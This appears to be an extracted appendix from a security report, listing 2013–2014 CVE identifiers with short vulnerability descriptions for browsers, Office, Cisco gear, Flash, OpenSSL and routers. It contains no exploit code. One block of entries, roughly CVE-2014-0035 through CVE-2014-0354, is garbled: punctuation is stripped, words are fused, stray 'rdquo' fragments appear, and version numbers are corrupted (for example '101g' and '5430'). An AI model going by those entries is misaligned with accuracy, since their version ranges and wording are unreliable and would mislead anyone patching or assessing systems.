CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 23 of 28
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
